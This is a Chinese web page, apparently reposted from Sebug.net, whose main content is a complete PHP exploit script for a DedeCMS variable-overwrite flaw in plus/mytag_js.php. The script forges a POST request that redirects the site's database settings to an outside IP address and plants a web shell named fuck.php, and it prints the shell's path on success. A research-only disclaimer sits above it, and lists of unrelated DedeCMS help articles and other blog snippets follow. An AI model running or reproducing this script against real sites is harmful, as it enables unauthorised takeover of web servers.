测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. #!usr/bin/php -w
    2. <?php
    3. error_reporting(E_ERROR);
    4. set_time_limit(0);
    5. print_r('
    6. DEDEcms Variable Coverage
    7. Exploit Author: [url]www.heixiaozi.com[/url] [url]www.webvul.com[/url]
    8. );
    9. echo "\r\n";
    10. if($argv[2]==null){
    11. print_r('
    12. +---------------------------------------------------------------------------+
    13. Usage: php '.$argv[0].' url aid path
    14. aid=1 shellpath /data/cache aid=2 shellpath=/ aid=3 shellpath=/plus/
    15. Example:
    16. php '.$argv[0].'[url]www.site.com[/url] 1 old
    17. +---------------------------------------------------------------------------+
    18. ');
    19. exit;
    20. }
    21. $url=$argv[1];
    22. $aid=$argv[2];
    23. $path=$argv[3];
    24. $exp=Getshell($url,$aid,$path);
    25. if (strpos($exp,"OK")>12){
    26. echo "[*] Exploit Success \n";
    27. if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php\n" ;
    28. if($aid==2)echo "[*]Shell:".$url."/$path/fuck.php\n" ;
    29. if($aid==3)echo "[*]Shell:".$url."/$path/plus/fuck.php\n";
    30. }else{
    31. echo "[*]ExploitFailed \n";
    32. }
    33. function Getshell($url,$aid,$path){
    34. $id=$aid;
    35. $host=$url;
    36. $port="80";
    37. $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    38. $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    39. $data .= "Host:".$host."\r\n";
    40. $data .= "User-Agent:Mozilla/5.0(Windows NT 5.2; rv:5.0.1)Gecko/20100101Firefox/5.0.1\r\n";
    41. $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    42. $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    43. //$data .= "Accept-Encoding: gzip,deflate\r\n";
    44. $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    45. $data .= "Connection: keep-alive\r\n";
    46. $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    47. $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    48. $data .= $content."\r\n";
    49. $ock=fsockopen($host,$port);
    50. if (!$ock) {
    51. echo "[*] No response from ".$host."\n";
    52. }
    53. fwrite($ock,$data);
    54. while (!feof($ock)) {
    55. $exp=fgets($ock, 1024);
    56. return $exp;
    57. }
    58. }
    59. ?>
    60. 摘自:http://sebug.net/vuldb/ssvid-20949

DeDeCMS(织梦)变量覆盖0day getshell的更多相关文章

  1. dedecms织梦首页被篡改 网站被黑被跳转的解决办法建议

    2018年的中秋节即将来临,我们Sine安全公司,最近接到很多用dedecms程序的企业公司网站客户的反馈,说是公司网站经常被篡改,包括网站首页的标题内容以及描述内容,都被改成了什么北京赛车,北京PK ...

  2. dedecms织梦自定义表单发送到邮箱-用163邮箱发送邮件

    https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&tn=monline_3_dg&wd=dedecms 邮箱&oq=d ...

  3. dedecms织梦系统后台验证码图片不显示的解决方法

    网站迁移后,dedecms织梦系统后台验证码图片不显示的解决方法通用解决方案-取消后台验证码功能因为没有验证码,不能进后台,所以修改php文件源代码:方法一:打开dede/login.php 找到如下 ...

  4. Dedecms织梦后台登陆验证码不显示几种解决方法

    Dedecms织梦后台登陆验证码不显示几种解决方法,服务器所造成的验证码不显示问题看这里: 方法一:查看服务器的php版本是否与程序版本兼容(织梦程序PHP版本查看方法:打开www.96net.com ...

  5. DEDECMS织梦后台更新网站栏目无反应一键更新无响应的解决方法

    很多站长朋友反应,经常会遇到DEDECMS织梦后台更新网站栏目无反应和一键更新无响应的问题,这个问题的所在就是在于恢复了数据或者覆盖了织梦后台文件之后,点击一键更新完全没反应,或者生成栏目的时候其他都 ...

  6. dedecms织梦如何删除所有的文章?

    dedecms织梦如何删除所有的文章?dede一键删除所有文章的SQL命令:  DELETE FROM dede_addonarticle WHERE aid >= 1 and aid<= ...

  7. dedecms 织梦ping服务插件 最新破解可用版

    dedecms 织梦ping服务插件 最新破解可用版  ping_gbk.xml <module> <baseinfo> name=ping服务 team=井哥 time=20 ...

  8. DEDECMS织梦全站动态化访问(包括自由列表freelist)及发布内容时自动动态化设置

    DEDECMS织梦 - 全站已有内容全部设置为动态化访问(包括自由列表freelist),以及发布内容时自动为动态化,设置分为三个步骤: 1.将所有文档设置为“仅动态”:执行以下mysql语句:upd ...

  9. dedecms织梦首页如何调用文章列表?

    如果冯耀宗博客类似,首页调用文章列表,同时也有许多企业站需要调用文章列表,今天我与大家来分享一下dedecms织梦首页如何调用文章列表? {dede:arclist     row='16'  tit ...

随机推荐

  1. OpenGL笔记<4> 数据传递二

    Sending data to a shader using uniform Preface 上一节我们介绍了通过顶点属性量进行数据传递,今天我们介绍一下通过uniform变量来进行数据传递的方法. ...

  2. HTTP 缓存之ETag 和Cache-Control的使用方法介绍

    什么是http缓存,有什么作用 通过网络获取内容既速度缓慢又开销巨大.较大的响应需要在客户端与服务器之间进行多次往返通信,这会延迟浏览器获得和处理内容的时间,还会增加访问者的流量费用.因此,缓存并重复 ...

  3. [HDU6212]Zuma

    题目大意: 祖玛游戏. 给你一个01串,你可以往里面加一些0或1,如果连续的0或1超过3个,那么就可以消去.问消去所有的珠子至少要加几个珠子. 思路: 区间DP. 首先把原来的01串,改成存储连续的同 ...

  4. [USACO5.5]Hidden Password

    题目大意: 求字符串最小表示. 思路: 本来按照lbn187的课件,知道SAM可以求字符串最小表示. 然而他并没有提供例题,就自己找了一道做. 大体思想就是把字符串复制一遍接在后面,构建SAM,然后每 ...

  5. 【BZOJ】4985: 评分【DP】

    4985: 评分 Time Limit: 10 Sec  Memory Limit: 64 MBSubmit: 148  Solved: 75[Submit][Status][Discuss] Des ...

  6. 【BZOJ-3527】力 FFT

    3527: [Zjoi2014]力 Time Limit: 30 Sec  Memory Limit: 256 MBSec  Special JudgeSubmit: 1544  Solved: 89 ...

  7. Python 学习笔记一

    前言 这篇博客是在学习某个网站时记录下来的,所以其纪录的顺序和那个网站里面一样,有些知识点已经大概了解了就不再赘述. 基础 字符串和编码 在计算机内存中,统一使用Unicode编码,当需要保存到硬盘或 ...

  8. Android MediaCodec 的实例化方法

    *由于作者水平限制,文中难免有错误和不恰当之处,望批评指正. *转载请注明出处:http://www.cnblogs.com/roger-yu/ MediaCodec的实例化方法主要有两种: 1.使用 ...

  9. linux—文件目录简单介绍

    1.Linux系统以文件目录的方式来组织和管理系统中的所有文件.所谓文件目录就是将所有文件的说明信息采用树型结构组织起来,即我们常说的目录:整个文件系统有一个“根”(root),然后在根上分“杈”(d ...

  10. elasticsearch中文分词+全文搜索demo

    本文假设你已经搭建好elasticsearch服务器,并在上面装了kibana和IK中文分词组件 elasticsearch+kibana+ik的安装,之前的文章有介绍,可参考. mapping介绍: ...